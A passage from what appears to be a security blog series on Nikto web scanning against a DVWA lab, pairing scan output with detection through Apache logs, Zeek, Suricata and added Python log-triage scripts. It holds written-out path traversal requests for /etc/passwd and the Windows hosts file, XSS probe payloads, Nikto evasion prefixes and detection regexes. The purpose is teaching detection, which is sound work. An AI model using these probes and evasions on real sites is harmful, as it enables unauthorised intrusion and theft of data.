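    if not m:
        return None
    size = m.group("size")
    return {"client": m.group("client"), "target": m.group("target"),
            "status": int(m.group("status")), "size": 0 if size == "-" else int(size)}


def parse_zeek(line: str) -> Optional[Dict]:
    if line.startswith("#"):  # #separator, #fields, #open, #close
        return None
    cols = line.rstrip("\n").split("\t")
    if len(cols) != len(ZEEK_FIELDS):
        return None
    rec = dict(zip(ZEEK_FIELDS, cols))
    num = lambda v: 0 if v == "-" else int(v)  # Zeek writes "-" for unset fields
    return {"client": rec["id.orig_h"], "target": rec["uri"],
            "status": num(rec["status_code"]), "size": num(rec["response_body_len"])}


def analyze(req: Dict) -> Finding:
    target = req["target"]
    path, _, query = target.partition("?")
    # Decode %2e%2e / %2f and fold backslashes so Windows-style payloads match too.
    dpath = unquote(path).replace("\\", "/")
    dquery = unquote(query).replace("\\", "/")
    return Finding(
        client=req["client"], status=req["status"], size=req["size"], raw_target=target,
        normalized_path=posixpath.normpath(dpath) if dpath.startswith("/") else dpath,
        evasion_prefix=bool(JUNK_PREFIX_RE.match(path)),
        path_traversal=bool(DOTDOT_RE.search(dpath)),
        query_traversal=bool(DOTDOT_RE.search(dquery)),
        sensitive=any(s in (dpath + "?" + dquery).lower() for s in SENSITIVE),
        succeeded=req["status"] == 200 and req["size"] > 0,
    )


def triage(lines: List[str], fmt: str) -> List[Finding]:
    """Findings for every request showing traversal, a sensitive file name, or the junk prefix."""
    parser = parse_apache if fmt == "apache" else parse_zeek
    findings = []
    for line in lines:
        req = parser(line)
        if req is None:
            continue
        f = analyze(req)
        if f.evasion_prefix or f.path_traversal or f.query_traversal or f.sensitive:
            findings.append(f)
    return findings


def needs_review(findings: List[Finding]) -> List[Finding]:
    """The subset worth checking on the host: a sensitive file came back with 200 and a body."""
    return [f for f in findings if f.succeeded and f.sensitive]


JUNK = "P4JTD9bmSV1pmv" * 3  # constructed stand-in for Nikto's long random prefix
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
SAMPLE_APACHE = [  # constructed to resemble the post's access.log
    f'10.0.0.107 - - [06/Jun/2023:15:12:50 -0400] "GET /{JUNK}/../favicon.ico HTTP/1.1" 200 30894 "-" "{UA}"',
    f'10.0.0.107 - - [06/Jun/2023:15:12:50 -0400] "GET /{JUNK}/../index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1" 302 - "-" "{UA}"',
    f'10.0.0.107 - - [06/Jun/2023:15:12:51 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "{UA}"',
    '10.0.0.107 - - [07/Jun/2023:14:36:24 -0400] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 4005 "-" "curl/7.88.1"',
]
SAMPLE_ZEEK = [  # constructed http.log: one comment line plus the curl request
    "#open\t2023-06-07-14-36-45",
    "\t".join(["1686163005.810950", "C7ccD83WRZobza0Lj9", "10.0.0.107", "59456", "10.0.0.106", "80",
               "1", "GET", "10.0.0.106",
               "/dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts",
               "-", "1.1", "curl/7.88.1", "-", "0", "4005", "200", "OK", "-", "-", "(empty)",
               "-", "-", "-", "-", "-", "-", "-", "-", "text/html"]),
]

if __name__ == "__main__":
    for fmt, lines in (("apache", SAMPLE_APACHE), ("zeek", SAMPLE_ZEEK)):
        found = triage(lines, fmt)
        print(f"{fmt}: {len(found)} traversal/junk-prefix request(s), {len(needs_review(found))} worth a host review")
        for f in needs_review(found):
            print(f"  {f.client} {f.status} {f.size}B {f.raw_target}")
```

<p>On the constructed data the favicon request is reported (junk prefix plus <i>/../</i>) but not escalated, because its normalized path is just <i>/favicon.ico</i> and no sensitive file name is involved; the <i>index.php?page=../../etc/passwd</i> probe names a sensitive file but got a 302 with no body; only the DVWA <i>hosts</i> request meets both tests, which is the same conclusion reached by hand above. The <i>OPTIONS *</i> line is parsed and dropped as uninteresting.</p>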
</div><div><br /></div><div><b><span style="font-size: medium;">Detect - Suricata (IDS) Analysis</span></b></div><div><br /></div><div><div>Setup Suricata to operate in IDS mode</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all</span>
</pre></div>
</div><p><br />What did the IDS produce? Looking at the first 5 entries.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5 </span>
<span style="color: white;"> 120 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt </span>
<span style="color: white;"> 16 1:2018056:4] ET WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY. </span>
<span style="color: white;"> 6 1:2021951:3] ET EXPLOIT Possible Magento Directory Traversal Attempt </span>
<span style="color: white;"> 4 1:2101402:9] GPL EXPLOIT iissamples access </span>
<span style="color: white;"> 4 1:2101245:13] GPL EXPLOIT ISAPI .idq access </span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><div>Nothing above that I would like to dig deeper into.</div><p>Looking at the actual attack from the IDS perspective.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat fast.log </span>
<span style="color: white;">06/07/2023-14:36:45.810950 [**] [1:2009362:7] ET WEB_SERVER /system32/ in Uri - Possible Protected Directory Access Attempt [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 10.0.0.107:59456 -> 10.0.0.106:80</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
</div><p>Looking at the packet.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat alert-debug.log </span>
<span style="color: white;">+================</span>
<span style="color: white;">TIME: 06/07/2023-14:36:45.810950</span>
<span style="color: white;">PKT SRC: wire/pcap</span>
<span style="color: white;">SRC IP: 10.0.0.107</span>
<span style="color: white;">DST IP: 10.0.0.106</span>
<span style="color: white;">PROTO: 6</span>
<span style="color: white;">SRC PORT: 59456</span>
<span style="color: white;">DST PORT: 80</span>
<span style="color: white;">TCP SEQ: 2738297529</span>
<span style="color: white;">TCP ACK: 2364260716</span>
<span style="color: white;">FLOW: to_server: TRUE, to_client: FALSE</span>
<span style="color: white;">FLOW Start TS: 06/07/2023-14:36:45.810580</span>
<span style="color: white;">FLOW PKTS TODST: 3</span>
<span style="color: white;">FLOW PKTS TOSRC: 1</span>
<span style="color: white;">FLOW Total Bytes: 404</span>
<span style="color: white;">FLOW IPONLY SET: TOSERVER: TRUE, TOCLIENT: TRUE</span>
<span style="color: white;">FLOW ACTION: DROP: FALSE</span>
<span style="color: white;">FLOW NOINSPECTION: PACKET: FALSE, PAYLOAD: FALSE, APP_LAYER: FALSE</span>
<span style="color: white;">FLOW APP_LAYER: DETECTED: TRUE, PROTO 1</span>
<span style="color: white;">PACKET LEN: 210</span>
<span style="color: white;">PACKET:</span>
<span style="color: white;"> 0000 08 00 27 88 B8 34 08 00 27 DB 96 6A 08 00 45 00 ..'..4.. '..j..E.</span>
<span style="color: white;"> 0010 00 C4 75 E1 40 00 40 06 AF 7E 0A 00 00 6B 0A 00 ..u.@.@. .~...k..</span>
<span style="color: white;"> 0020 00 6A E8 40 00 50 A3 37 1A B9 8C EB C1 6C 50 18 .j.@.P.7 .....lP.</span>
<span style="color: white;"> 0030 01 F6 15 8B 00 00 47 45 54 20 2F 64 76 77 61 2F ......GE T /dvwa/</span>
<span style="color: white;"> 0040 76 75 6C 6E 65 72 61 62 69 6C 69 74 69 65 73 2F vulnerab ilities/</span>
<span><span style="color: white;"> 0050 66 69 2F 3F </span><span style="color: #fcff01;"><b>70 61 67 65 3D 2E 2E 2F 2E 2E 2F 2E</b></span><span style="color: white;"> fi/?</span><b><span style="color: #fcff01;">page =../../.</span></b></span><b style="color: #fcff01;">
</b><span style="color: #fcff01; font-weight: bold;"> 0060 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 77 69 6E 64 6F ./../../ ../windo</span><b style="color: #fcff01;">
</b><span style="color: #fcff01; font-weight: bold;"> 0070 77 73 2F 73 79 73 74 65 6D 33 32 2F 64 72 69 76 ws/syste m32/driv</span><b style="color: #fcff01;">
</b><span><b style="color: #fcff01;"> 0080 65 72 73 2F 65 74 63 2F 68 6F 73 74 73 </b><span style="color: white;">20 48 54</span><b style="color: #fcff01;"> ers/etc/ hosts</b></span><span style="color: white;"> HT</span>
<span style="color: white;"> 0090 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 31 30 TP/1.1.. Host: 10</span>
<span style="color: white;"> 00A0 2E 30 2E 30 2E 31 30 36 0D 0A 55 73 65 72 2D 41 .0.0.106 ..User-A</span>
<span style="color: white;"> 00B0 67 65 6E 74 3A 20 63 75 72 6C 2F 37 2E 38 38 2E gent: cu rl/7.88.</span>
<span style="color: white;"> 00C0 31 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 1..Accep t: */*..</span>
<span style="color: white;"> 00D0 0D 0A ..</span>
<span>...</span>
</pre></div>
<p></p><p>Nothing else to look at here.</p><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div><div><br /></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-31797275137768558212023-12-12T18:26:00.000-08:002023-12-12T18:37:08.915-08:00Beginning Nikto - Injection (XSS/Script/HTML) - with 
evasion type 3 -> Premature URL ending<p>This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and its detection</a>. </p><p>From the hacking perspective, Nikto is the tool used. From the detection perspective, the tools and processes used for the network forensics are log analysis, TShark, Zeek and Suricata.</p><p>Evasion type 3 (Premature URL ending) prefixes every request path with "<i>/%20HTTP/1.1%0d%0aAccept%3a%20&lt;random&gt;/../../</i>". Once URL-decoded that reads "<i>/ HTTP/1.1\r\nAccept: &lt;random&gt;/../../dvwa/...</i>", which looks like an early end of the request line followed by a bogus header, while the web server simply resolves the "<i>../..</i>" and serves the real path. Keep that prefix in mind when reading the output and the logs below.</p><p>Posts in this series:</p><p><span style="font-size: medium;"><b>The hack - Testing for injection types of attacks.</b></span></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106/dvwa -ipv4 -Display 2 --ask no -Format json -o /tmp/nikto.json -nossl -no404 -Tuning 4 -evasion 3 </span>
<span style="color: white;">- Nikto v2.5.0</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%209dezoCMqi7/../../dvwa/ sent cookie: security=low; path=/</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%209dezoCMqi7/../../dvwa/ sent cookie: PHPSESSID=6d25e0unoqrfr1822r98chsjr3; expires=Sat, 03-Jun-2023 17:37:21 GMT; Max-Age=86400; path=/</span>
<span style="color: white;">+ Target IP: 10.0.0.106</span>
<span style="color: white;">+ Target Hostname: 10.0.0.106</span>
<span style="color: white;">+ Target Port: 80</span>
<span style="color: white;">+ Using Encoding: Premature URL ending</span>
<span style="color: white;">+ Start Time: 2023-06-02 13:37:42 (GMT-4)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28</span>
<span style="color: white;">+ /dvwa/cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options</span>
<span style="color: white;">...</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%20p2zcHyr0eeyZKdsykh/../../dvwa/ sent cookie: security=low; path=/</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%20p2zcHyr0eeyZKdsykh/../../dvwa/ sent cookie: PHPSESSID=jaes6gbb1elm9qft6eti7nbrl8; expires=Sat, 03-Jun-2023 17:37:21 GMT; Max-Age=86400; path=/</span>
<span style="color: white;">+ /dvwa/: Retrieved x-powered-by header: PHP/8.0.28.</span>
<span style="color: white;">+ /dvwa/: Cookie security created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies</span>
<span style="color: white;">+ /dvwa/: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies</span>
<span style="color: white;">...</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%20ru6vqb1X2lXvU6PYe/../../dvwa/index.php?option=search&searchword=<script>alert(document.cookie);</script> sent cookie: security=low; path=/</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%20n6qmprr4FiSvDr7/../../dvwa/index.php?dir=<script>alert('Vulnerable')</script> sent cookie: security=low; path=/</span>
<span style="color: white;">...</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%20XUyeQs43O3P6ka/../../dvwa/phpinfo.php?cx[]=rYLxwx...zxZ2HcuXX<script>alert(foo)</script> sent cookie: PHPSESSID=adhqsj51ur05nph7mitqi9kfvc; expires=Sat, 03-Jun-2023 17:37:25 GMT; Max-Age=86400; path=/</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%20OME1Ins6pMdk8/../../dvwa/?xmlcontrol=body%20onload=alert(123) sent cookie: security=low; path=/</span>
<span style="color: white;">+ 958 requests: 0 error(s) and 10 item(s) reported on remote host</span>
<span style="color: white;">+ End Time: 2023-06-02 13:37:45 (GMT-4) (3 seconds)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ 1 host(s) tested</span>
<span style="color: white;">---------------------------------------------------------------------------</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>From the output above, requests such as "<i>index.php?dir=<script>alert('Vulnerable')</script></i>" are reported as "<i>sent cookie</i>", even though the source of <i>index.php</i> never references a <i>dir</i> parameter. Nikto's "<i>sent cookie</i>" means the server answered that request with a <i>Set-Cookie</i> header, and DVWA does that for any request to <i>index.php</i>: PHP starts a session (<i>PHPSESSID</i>) and DVWA sets its <i>security</i> cookie no matter which query parameters were supplied. The parameter is not what triggered the cookie; the page is.</p><p>Here are some of the unique parameters that were passed and their values. They come from Nikto's own test database (the <i>-Tuning 4</i> injection tests, which target many different applications), not from anything Nikto learned about this page.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat tuning_4.txt | grep --perl-regexp 'index.php\?.*?</script>|phpinfo.php\?.*?</script>' --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">head --lines=20 | sort --unique </span>
<span style="color: white;">index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script></span>
<span style="color: white;">index.php?action=storenew&username=<script>alert('Vulnerable')</script></span>
<span style="color: white;">index.php?dir=<script>alert('Vulnerable')</script></span>
<span style="color: white;">index.php?err=3&email=\"><script>alert(document.cookie)</script></span>
<span style="color: white;">index.php?file=Liens&op=\"><script>alert('Vulnerable');</script></span>
<span style="color: white;">index.php?option=search&searchword=<script>alert(document.cookie);</script></span>
<span style="color: white;">index.php?rep=<script>alert(document.cookie)</script></span>
<span style="color: white;">index.php?vo=\"><script>alert(document.cookie);</script></span>
<span style="color: white;">phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script></span>
<span style="color: white;">phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script></span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Time to transition to the log analysis and see what it adds.</p><p>For more on attacking and detecting cross site scripting, see: <br /><a href="https://www.securitynik.com/2017/02/beginning-web-application-testing-cross.html">Learning by practicing: Beginning Web Application Testing - Cross Site Scripting (XSS)–DVWA (securitynik.com)</a><br /><br /></p><div><b><span style="font-size: medium;">Detect - Log Analysis</span></b></div><div><br /></div><div><div>Time to understand, from the logs, what this Nikto attack looks like.</div><div><br /></div><div>Looking at the first 3 entries in the access log. Note the browser-like User-Agent: the scanner is not announcing itself here, so the request paths, not the UA, are what give it away.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ head access.log --lines=3</span>
<span style="color: white;">10.0.0.108 - - [02/Jun/2023:13:37:21 -0400] "GET /%20HTTP/1.1%0d%0aAccept%3a%20oJaLwmzNOomj5k/../../ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [02/Jun/2023:13:37:21 -0400] "GET /%20HTTP/1.1%0d%0aAccept%3a%209dezoCMqi7/../../dvwa/ HTTP/1.1" 200 5960 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [02/Jun/2023:13:37:21 -0400] "GET /%20HTTP/1.1%0d%0aAccept%3a%20XvKT1obCp7xvYUFzg5/../../dvwa/cgi.cgi/ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the HTTP methods.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat access.log | cut --fields 2 --delimiter '"' | cut -f 1 -d ' ' | sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 939 GET</span>
<span style="color: white;"> 9 POST</span>
<span style="color: white;"> 2 TRACK</span>
<span style="color: white;"> 2 OPTIONS</span>
<span style="color: white;"> 1 XULKCYAP</span>
<span style="color: white;"> 1 TRACE</span>
<span style="color: white;"> 1 <script>alert(1)</script></span>
<span style="color: white;"> 1 PUT</span>
<span style="color: white;"> 1 PROPFIND</span>
<span style="color: white;"> 1 DEBUG</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the response codes, we see 33 <i>200</i>s. The non-numeric values (<i>HTTP/1.1</i>, <i>Vulnerable\\\</i>, <i>test\\\</i>, ...) are not status codes: Apache escapes a literal double quote inside the request line as <i>\"</i>, and <i>cut</i> splits on every <i>"</i> regardless, so for the requests carrying a <i>\"&gt;&lt;script&gt;...</i> payload the third quote-delimited field is still part of the request rather than the status. A parser that honours the escaping avoids this; it does not change the overall picture here.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat access.log | cut --fields 3 --delimiter '"' | cut --fields=2 --delimiter=' ' | sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 821 404</span>
<span style="color: white;"> 54 HTTP/1.1</span>
<span style="color: white;"> 33 200</span>
<span style="color: white;"> 17 403</span>
<span style="color: white;"> 9 Vulnerable\\\</span>
<span style="color: white;"> 5 test\\\</span>
<span style="color: white;"> 4 400</span>
<span style="color: white;"> 4 301</span>
<span style="color: white;"> 3 &lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\</span>
<span style="color: white;"> 1 ><script>alert(1)/script><\\\</span>
<span style="color: white;"> 1 ><Img%20Src=javascript:alert('Vulnerable')><Img%20Src=\\\</span>
<span style="color: white;"> 1 ><img%20src=\\\</span>
<span style="color: white;"> 1 hello\\\</span>
<span style="color: white;"> 1 417</span>
<span style="color: white;"> 1 405</span>
<span style="color: white;"> 1 302</span>
<span style="color: white;"> 1 >\\\</span>
</pre></div>
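<p>Cutting on double quotes breaks on exactly the requests that matter here, so below is a small log parser, added as an example for this post (it is not the author's tooling), that honours Apache's <i>\"</i> escaping, strips the evasion-3 prefix by resolving the dot segments the same way the server does, and flags bogus methods and script payloads. The four log lines it runs on are constructed to mirror the <i>access.log</i> entries above; the <i>501</i> on the bogus-method line is an assumed value, not captured output.</p>

```python
"""Triage an Apache access.log from a Nikto run that uses -evasion 3.

Added example for this post, not the post's own tooling. The sample lines are
constructed to mirror the access.log entries shown above; the 501 status on the
bogus-method line is an assumed value, not captured output.
"""
import posixpath
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample input. Line 3 carries an escaped quote (\") inside the request
# line, which is exactly what shifts the fields under `cut --delimiter='"'`.
SAMPLE_LOG = r'''10.0.0.108 - - [02/Jun/2023:13:37:21 -0400] "GET /%20HTTP/1.1%0d%0aAccept%3a%209dezoCMqi7/../../dvwa/ HTTP/1.1" 200 5960 "-" "Mozilla/5.0"
10.0.0.108 - - [02/Jun/2023:13:37:21 -0400] "GET /%20HTTP/1.1%0d%0aAccept%3a%20XvKT1obCp7xvYUFzg5/../../dvwa/cgi.cgi/ HTTP/1.1" 404 297 "-" "Mozilla/5.0"
10.0.0.108 - - [02/Jun/2023:13:37:24 -0400] "GET /%20HTTP/1.1%0d%0aAccept%3a%20j7vq9Hi1xXNr4X/../../dvwa/index.php?file=Liens&op=\"><script>alert('Vulnerable');</script> HTTP/1.1" 200 5960 "-" "Mozilla/5.0"
10.0.0.108 - - [02/Jun/2023:13:37:25 -0400] "XULKCYAP / HTTP/1.1" 501 - "-" "Mozilla/5.0"
'''

# Combined log format; a quoted field is (?:[^"\\]|\\.)* so that \" does not end it.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}|-) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)

# Nikto evasion 3: a fake end of request line (" HTTP/1.1\r\nAccept: <random>") is
# prepended to the path, then ../.. climbs back out so the server serves the real target.
EVASION3_RE = re.compile(r'^/%20HTTP/1\.1%0d%0aAccept%3a%20[A-Za-z0-9]+/(?:\.\./)+', re.I)

XSS_RE = re.compile(r'<\s*script|javascript:|on(?:load|error|mouseover)\s*=|alert\s*\(', re.I)

KNOWN_METHODS = {'GET', 'POST', 'HEAD', 'OPTIONS', 'PUT', 'DELETE', 'TRACE', 'PATCH', 'PROPFIND'}


def unescape_apache(field):
    """Undo Apache's backslash escaping of '"' and '\\' inside a logged field."""
    return re.sub(r'\\(["\\])', r'\1', field)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    method, _, rest = unescape_apache(rec['request']).partition(' ')
    target, _, version = rest.rpartition(' ')
    rec.update(method=method, target=target, version=version)
    return rec


def decode_target(target):
    """Split the query off, percent-decode, and resolve dot segments the way the
    server does, which strips the evasion-3 prefix and exposes the real path."""
    raw_path, _, raw_query = target.partition('?')
    evasion = bool(EVASION3_RE.match(raw_path))
    path = posixpath.normpath(unquote(raw_path)) if raw_path else ''
    return path, unquote(raw_query), evasion


def triage(log_text):
    """Count methods and status codes correctly and list the requests worth a look."""
    methods, statuses, hits = Counter(), Counter(), []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        methods[rec['method']] += 1
        statuses[rec['status']] += 1
        path, query, evasion = decode_target(rec['target'])
        reasons = []
        if evasion:
            reasons.append('nikto-evasion-3')
        if rec['method'] not in KNOWN_METHODS:
            reasons.append('bogus-method')
        if XSS_RE.search(path) or XSS_RE.search(query):
            reasons.append('xss-payload')
        if reasons:
            hits.append({'client': rec['client'], 'status': rec['status'],
                         'path': path, 'query': query, 'reasons': reasons})
    return {'methods': methods, 'statuses': statuses, 'hits': hits}


if __name__ == '__main__':
    result = triage(SAMPLE_LOG)
    print(dict(result['methods']), dict(result['statuses']))
    for hit in result['hits']:
        print(hit['status'], hit['path'], hit['query'][:60], hit['reasons'])
```

<p>Run it against the real file with <i>triage(open('access.log').read())</i>. The normalised <i>path</i> column is what the server actually served, so grouping hits by it collapses the hundreds of random-prefixed requests into the handful of targets Nikto was really probing.</p>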
</div><div><br /></div><div>The script tag is definitely a cause for concern in this case. </div><div><br /></div><div>Peeking at the first 5 requests that returned a <i>200</i> and contain "<i>script</i>".</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat access.log | grep --perl-regexp "\s+200\s+" | cut --fields=2- --delimiter='"' | awk --field-separator=' 200 ' '{ print $1 }' | grep "script" --color=always | head --lines=5</span>
<span style="color: white;">GET /%20HTTP/1.1%0d%0aAccept%3a%20ru6vqb1X2lXvU6PYe/../../dvwa/index.php?option=search&searchword=<script>alert(document.cookie);</script> HTTP/1.1"</span>
<span style="color: white;">GET /%20HTTP/1.1%0d%0aAccept%3a%20n6qmprr4FiSvDr7/../../dvwa/index.php?dir=<script>alert('Vulnerable')</script> HTTP/1.1"</span>
<span style="color: white;">GET /%20HTTP/1.1%0d%0aAccept%3a%20qMTw97IoYwjs/../../dvwa/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script> HTTP/1.1"</span>
